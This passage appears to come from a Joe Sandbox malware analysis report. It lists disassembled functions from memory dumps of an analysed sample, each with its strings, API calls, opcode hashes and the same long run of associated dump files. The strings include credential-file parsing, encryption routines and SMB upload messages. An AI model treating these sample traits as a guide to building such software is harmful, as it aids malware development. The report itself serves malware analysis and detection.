                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                                  • API String ID: 0-2058201250
                                                  • Opcode ID: 376a32ada3b7b02ecdbbe8d7719c913acd91871f8e1119bd90e2f22d0effe551
                                                  • Instruction ID: c1ccface3019dc4a1148becec208f9adea41b0a3b7a510a7f2895235713754c0
                                                  • Opcode Fuzzy Hash: 376a32ada3b7b02ecdbbe8d7719c913acd91871f8e1119bd90e2f22d0effe551
                                                  • Instruction Fuzzy Hash: 1B6106A5E0838567E718A622AC56B3B7AC9BBD0304F04483DF9CAD7293FA75DD008253
                                                  Function 00545DB0 Relevance: 10.1, Strings: 8, Instructions: 114COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                  • API String ID: 0-3476178709
                                                  • Opcode ID: cb4161280bf21cc9c632dd0383af9b4d46d6ba99e921977287d105e605063081
                                                  • Instruction ID: c44044705dbfb6a58790646d15f02d714383b26f824eb82646dd784c057d095b
                                                  • Opcode Fuzzy Hash: cb4161280bf21cc9c632dd0383af9b4d46d6ba99e921977287d105e605063081
                                                  • Instruction Fuzzy Hash: 5F31E372B04A4537E7284109CC46F7E045FD3C9B18E6AC67EF60AAB6C3E8B59E144265
                                                  Function 006F0D80 Relevance: 9.5, Strings: 7, Instructions: 705COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                                  • API String ID: 0-2550110336
                                                  • Opcode ID: 47b939516f91fc9d3f48de5b5e03a46e82c621ca04421af787345afab33e7736
                                                  • Instruction ID: c69861d06fe70ea896896b47463136c46e55a4069fc7784951bc4371904cf214
                                                  • Opcode Fuzzy Hash: 47b939516f91fc9d3f48de5b5e03a46e82c621ca04421af787345afab33e7736
                                                  • Instruction Fuzzy Hash: 4632353074834CFBE720AAA49C42F7A7797AF42B44F18491CFB44AE2C3DB70A951C656
                                                  Function 005FEF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $.$;$?$?$xn--$xn--
                                                  • API String ID: 0-543057197
                                                  • Opcode ID: 0f441abd2904b97a2f6a5640bd6d3d123d978eba23e927b88e0f8249846a2664
                                                  • Instruction ID: 4302658d6ab9b7dc41eed986105660836a55659545876c7c2718712fbb879037
                                                  • Opcode Fuzzy Hash: 0f441abd2904b97a2f6a5640bd6d3d123d978eba23e927b88e0f8249846a2664
                                                  • Instruction Fuzzy Hash: 9D221672A083059BEB249A24DC45B7B7AD9BF90348F04493CFA4AD7692FB39DD04C752
                                                  Function 008BE030 Relevance: 9.1, APIs: 1, Strings: 3, Instructions: 2082COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $d$nil)
                                                  • API String ID: 0-394766432
                                                  • Opcode ID: 6d05e80f79f1362c02ab36d6a9e98971de75ce6373c427449fcd34aa94e02549
                                                  • Instruction ID: 10af5c52426fd3200dee9d811ec694d4bc60e556ee127e9b27a802890edaa990
                                                  • Opcode Fuzzy Hash: 6d05e80f79f1362c02ab36d6a9e98971de75ce6373c427449fcd34aa94e02549
                                                  • Instruction Fuzzy Hash: A11326706087458FD720CF28C4806AABBE1FF99358F28496DE995DB362D771EC45CB82
                                                  Function 005F8F90 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 256COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUnicastIpAddressTable.IPHLPAPI(?,?), ref: 005F8FE6
                                                  • FreeMibTable.IPHLPAPI(?), ref: 005F917A
                                                  • FreeMibTable.IPHLPAPI(?), ref: 005F91A5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: Table$Free$AddressUnicast
                                                  • String ID: 127.0.0.1$::1
                                                  • API String ID: 576766143-3302937015
                                                  • Opcode ID: 031b938eb56098692316e597eb75c23f349e354152c8095c6f18ce997fc09315
                                                  • Instruction ID: 0e83409dc468b52bf7b10c0818aa32cf4d8e1d73fe74515bf873d858a311184f
                                                  • Opcode Fuzzy Hash: 031b938eb56098692316e597eb75c23f349e354152c8095c6f18ce997fc09315
                                                  • Instruction Fuzzy Hash: E0A1F4B1C047469BE700DF25C845736BBE4BF95304F158A29F9888B261FB75ED90C792
                                                  Function 0053A960 Relevance: 9.0, Strings: 6, Instructions: 1491COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                  • API String ID: 0-2555271450
                                                  • Opcode ID: 9fd6b72ca00c84835091b2f7a5d8b167094339492af70583c7b5cd1bec956f40
                                                  • Instruction ID: b203285c70c8d203d8bd73214ddf98d5fd83eefbc75d69febc48991e5c4b776c
                                                  • Opcode Fuzzy Hash: 9fd6b72ca00c84835091b2f7a5d8b167094339492af70583c7b5cd1bec956f40
                                                  • Instruction Fuzzy Hash: 74C26971A087458FDB14CE28C49076AFBE2FFC9314F158A2DE9999B352D730ED458B82
                                                  Function 0053E620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                  • API String ID: 0-2555271450
                                                  • Opcode ID: e84065b34755d440fb45e7c5680dd5bd19894dd0440ef3e3148806552cce67b3
                                                  • Instruction ID: e83725ef21a0a3ec3155c658d20802208a56effe9e04555b93e1501825fc592e
                                                  • Opcode Fuzzy Hash: e84065b34755d440fb45e7c5680dd5bd19894dd0440ef3e3148806552cce67b3
                                                  • Instruction Fuzzy Hash: 89826A71A083419FDB14CE28C88576BBBE1BFC5724F188A2DF9A997291D730DC45CB92
                                                  Function 00596210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: default$login$macdef$machine$netrc.c$password
                                                  • API String ID: 0-1043775505
                                                  • Opcode ID: b052afbcc5987c17aabe01551eddcf37648ea907dbbae9c9a5b1184552deda7c
                                                  • Instruction ID: d91f255c4a871b75bc98c8f8da410489954b8225c25dd6bab2964cec03aadb96
                                                  • Opcode Fuzzy Hash: b052afbcc5987c17aabe01551eddcf37648ea907dbbae9c9a5b1184552deda7c
                                                  • Instruction Fuzzy Hash: E1E10474948341ABEF219F24D88572B7FD4BF85758F184C2CF88557282E3B9994CCBA2
                                                  Function 0059A7F0 Relevance: 6.9, Strings: 5, Instructions: 687COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                  • API String ID: 0-4201740241
                                                  • Opcode ID: bb0d0017297b573ede332493acd6390fd57fac70fe390befc23da5ba3ce98793
                                                  • Instruction ID: 4e24ac7aabc161e07fe45fab8712fba7ff0c2e725da1a9090f31bfb6c8b2ab0c
                                                  • Opcode Fuzzy Hash: bb0d0017297b573ede332493acd6390fd57fac70fe390befc23da5ba3ce98793
                                                  • Instruction Fuzzy Hash: A962C1B0914741DBEB14CF24C4947AAB7E4FF98304F04962DE88D8B352E774EA94CB96
                                                  Function 008B3A70 Relevance: 6.8, Strings: 5, Instructions: 517COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
